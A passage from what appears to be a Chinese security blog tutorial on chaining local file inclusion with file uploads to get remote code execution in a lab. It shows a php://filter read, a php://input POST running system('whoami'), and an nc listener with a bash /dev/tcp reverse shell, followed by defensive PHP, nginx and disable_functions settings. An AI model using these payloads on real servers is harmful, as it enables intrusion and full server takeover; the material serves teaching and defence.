<li>上传 <code>shell.php.jpg</code> 或 <code>shell.txt</code>。</li>
<li>配合 LFI 包含：<code>page=Uploads/shell.php.jpg</code>。</li>
</ul>
<h3 id="3-PHP-协议"><a href="#3-PHP-协议" class="headerlink" title="3. PHP 协议"></a>3. PHP 协议</h3><ul>
<li>使用 <code>php://filter</code> 读取文件：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://localhost:8080/index.php?page=php://filter/convert.base64-encode/resource=index.php<br></code></pre></td></tr></table></figure></li>
<li>使用 <code>php://input</code> 执行代码：<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/index.php?page=php://input</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>localhost:8080<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><br><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;whoami&#x27;</span>); <span class="hljs-meta">?&gt;</span></span><br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="4-反弹-Shell"><a href="#4-反弹-Shell" class="headerlink" title="4. 反弹 Shell"></a>4. 反弹 Shell</h3><ul>
<li>在 Kali 启动监听：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvnp 4444<br></code></pre></td></tr></table></figure></li>
<li>WebShell 执行：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">bash -i &gt;&amp; /dev/tcp/&lt;你的IP&gt;/4444 0&gt;&amp;1<br></code></pre></td></tr></table></figure></li>
</ul>
<hr>
<h2 id="六、防御建议"><a href="#六、防御建议" class="headerlink" title="六、防御建议"></a>六、防御建议</h2><h3 id="1-开发层"><a href="#1-开发层" class="headerlink" title="1. 开发层"></a>1. 开发层</h3><ul>
<li><strong>白名单加载文件</strong>：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$allowed</span> = [<span class="hljs-string">&#x27;home.php&#x27;</span>, <span class="hljs-string">&#x27;about.php&#x27;</span>];<br><span class="hljs-variable">$page</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>] ?? <span class="hljs-string">&#x27;home.php&#x27;</span>;<br><span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$page</span>, <span class="hljs-variable">$allowed</span>)) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;非法访问！&quot;</span>);<br>&#125;<br><span class="hljs-keyword">include</span>(<span class="hljs-variable">$page</span>);<br></code></pre></td></tr></table></figure></li>
<li><strong>路径验证</strong>：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$page</span> = <span class="hljs-title function_ invoke__">basename</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>]);<br><span class="hljs-keyword">include</span>(<span class="hljs-string">&quot;pages/<span class="hljs-subst">$page</span>&quot;</span>);<br></code></pre></td></tr></table></figure></li>
<li><strong>文件上传校验</strong>：<ul>
<li>检查 MIME 类型：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$finfo</span> = <span class="hljs-title function_ invoke__">finfo_open</span>(FILEINFO_MIME_TYPE);<br><span class="hljs-variable">$mime</span> = <span class="hljs-title function_ invoke__">finfo_file</span>(<span class="hljs-variable">$finfo</span>, <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>]);<br><span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$mime</span>, [<span class="hljs-string">&#x27;image/jpeg&#x27;</span>, <span class="hljs-string">&#x27;image/png&#x27;</span>])) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;仅允许图片！&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure></li>
<li>重命名文件：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$newname</span> = <span class="hljs-title function_ invoke__">uniqid</span>() . <span class="hljs-string">&#x27;.jpg&#x27;</span>;<br><span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>], <span class="hljs-string">&quot;Uploads/<span class="hljs-subst">$newname</span>&quot;</span>);<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h3 id="2-服务器配置"><a href="#2-服务器配置" class="headerlink" title="2. 服务器配置"></a>2. 服务器配置</h3><ul>
<li><strong>Nginx 限制 PHP 执行</strong>：<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-section">location</span> /Uploads/ &#123;<br>    <span class="hljs-section">location</span> <span class="hljs-regexp">~ \.php$</span> &#123;<br>        <span class="hljs-attribute">deny</span> all;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure></li>
<li><strong>PHP 配置</strong>：<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">open_basedir</span> = /var/www/html/<br><span class="hljs-attr">disable_functions</span> = system,exec,shell_exec,passthru,proc_open<br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="3-WAF-部署"><a href="#3-WAF-部署" class="headerlink" title="3. WAF 部署"></a>3. WAF 部署</h3><ul>
<li>拦截异常路径（如 <code>../</code>、<code>php://</code>）。</li>
<li>检测包含 PHP 代码的上传文件。</li>
</ul>
<h3 id="4-日志与监控"><a href="#4-日志与监控" class="headerlink" title="4. 日志与监控"></a>4. 日志与监控</h3><ul>
<li>定期检查 Nginx 和 PHP 日志。</li>
<li>扫描上传目录，删除可疑文件。</li>
</ul>
<hr>
<h2 id="七、复现流程总结图"><a href="#七、复现流程总结图" class="headerlink" title="七、复现流程总结图"></a>七、复现流程总结图</h2><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs css">graph <span class="hljs-selector-tag">TD</span><br>    <span class="hljs-selector-tag">A</span><span class="hljs-selector-attr">[上传恶意文件&lt;br&gt;shell.txt]</span> --&gt; <span class="hljs-selector-tag">B</span><span class="hljs-selector-attr">[存储到&lt;br&gt;Uploads/shell.txt]</span><br>    <span class="hljs-selector-tag">B</span> --&gt; C<span class="hljs-selector-attr">[LFI 包含&lt;br&gt;include(Uploads/shell.txt)]</span><br>    C --&gt; D<span class="hljs-selector-attr">[PHP 执行&lt;br&gt;system($_GET[<span class="hljs-string">&#x27;cmd&#x27;</span>]</span>)]<br>    <span class="hljs-selector-tag">A</span> --&gt; E<span class="hljs-selector-attr">[Session 注入&lt;br&gt;sess_abcxyz]</span><br>    <span class="hljs-selector-tag">A</span> --&gt; F<span class="hljs-selector-attr">[日志注入&lt;br&gt;access.log]</span><br>    E --&gt; C<br>    F --&gt; C<br></code></pre></td></tr></table></figure>

<h2 id="八、附加实验建议"><a href="#八、附加实验建议" class="headerlink" title="八、附加实验建议"></a>八、附加实验建议</h2><ol>
<li><strong>其他靶场</strong>：<ul>
<li><strong>DVWA</strong>：File Upload + LFI 模块</li>
<li><strong>bWAPP</strong>：LFI + Log Injection</li>
<li><strong>Vulhub</strong>：nginx-php-fpm-lfi</li>
</ul>
</li>
<li><strong>进阶利用</strong>：<ul>
<li>使用 <code>php://input</code> 直接提交 PHP 代码。</li>
<li>结合 <code>php://filter</code> 读取源代码。</li>
</ul>
</li>
<li><strong>工具配合</strong>：<ul>
<li><strong>蚁剑</strong>：管理上传的 WebShell。</li>
<li><strong>Burp Suite</strong>：修改上传文件名或注入日志。</li>
</ul>
</li>
</ol>
<hr>
<h2 id="九、总结"><a href="#九、总结" class="headerlink" title="九、总结"></a>九、总结</h2><table>
<thead>
<tr>
<th>项目</th>
<th>信息</th>
</tr>
</thead>
<tbody><tr>
<td><strong>漏洞类型</strong></td>
<td>LFI + 文件上传 &#x3D; RCE</td>
</tr>
<tr>
<td><strong>靶场</strong></td>
<td>Vulhub 或手动搭建 PHP 环境</td>
</tr>
<tr>
<td><strong>利用方式</strong></td>
<td>上传 PHP 代码 + LFI 包含</td>
</tr>
<tr>
<td><strong>进阶技巧</strong></td>
<td>日志注入、Session 注入、协议利用</td>
</tr>
<tr>
<td><strong>危害</strong></td>
<td>敏感信息泄露、服务器完全控制</td>
</tr>
<tr>
<td><strong>修复核心</strong></td>
<td>白名单校验、路径限制、上传过滤</td>
</tr>
</tbody></table>
<p>LFI 与文件上传漏洞的联动攻击展示了 Web 应用安全设计的复杂性。通过上传恶意文件并利用 LFI 包含，攻击者可轻松实现 RCE。开发者应采用白名单机制、严格校验上传文件、限制 PHP 执行路径，并部署 WAF 和日志监控，构建多层次防御体系。</p>
<blockquote>
<p><strong>免责声明</strong>：本文内容仅供合法授权的渗透测试和安全研究，严禁用于非法用途！</p>
</blockquote>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web%E5%AE%89%E5%85%A8/" class="category-chain-item">Web安全</a>
  
  
    <span>></span>
    
  <a href="/categories/Web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" class="category-chain-item">漏洞利用</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Web%E5%AE%89%E5%85%A8/" class="print-no-link">#Web安全</a>
      
        <a href="/tags/Vulhub/" class="print-no-link">#Vulhub</a>
      
        <a href="/tags/RCE/" class="print-no-link">#RCE</a>
      
        <a href="/tags/%E8%9A%81%E5%89%91/" class="print-no-link">#蚁剑</a>
      
        <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="print-no-link">#文件上传</a>
      
        <a href="/tags/LFI/" class="print-no-link">#LFI</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>本地文件包含（LFI）与文件上传漏洞联动实现 RCE</div>
      <div>https://bae-ace.github.io/2025/08/06/本地文件包含（LFI）与文件上传漏洞联动实现-RCE/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>bae</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年8月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/08/07/%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%88LFI%EF%BC%89%E6%BC%8F%E6%B4%9E%E8%AF%A6%E8%A7%A3%EF%BC%9A%E5%9F%BA%E4%BA%8E-DVWA-%E7%9A%84%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8/" title="本地文件包含（LFI）漏洞详解：基于 DVWA 的原理与利用">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">本地文件包含（LFI）漏洞详解：基于 DVWA 的原理与利用</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/08/05/Nginx-%E4%B8%8E-PHP-FPM-%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-RCE-%E6%BC%8F%E6%B4%9E/" title="Nginx 与 PHP-FPM 配置不当导致文件上传 RCE 漏洞（基于 Vulhub）">
                        <span class="hidden-mobile">Nginx 与 PHP-FPM 配置不当导致文件上传 RCE 漏洞（基于 Vulhub）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"CHbSLmwKFof8sHkOvlnoDfza-MdYXbMMI","appKey":"lVqIfnWUAiZZLIag2RoSpxoo","serverURLs":"https://chbslmwk.api.lncldglobal.com","placeholder":"留言仅限讨论，禁止广告等行为","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  



  <script>
  Fluid.utils.createScript('https://lib.baomitu.com/mermaid/8.14.0/mermaid.min.js', function() {
    mermaid.initialize({"theme":"default"});

    Fluid.utils.listenDOMLoaded(function() {
      Fluid.events.registerRefreshCallback(function() {
        if ('mermaid' in window) {
          mermaid.init();
        }
      });
    });
  });
</script>






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://bae-ace.github.io" target="_blank" rel="nofollow noopener"><span>github</span></a> <i class="iconfont icon-love"></i> <a href="https://bae-ace.github.io/" target="_blank" rel="nofollow noopener"><span>bae</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/love.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiaoxingxing.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiaoxuehua.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
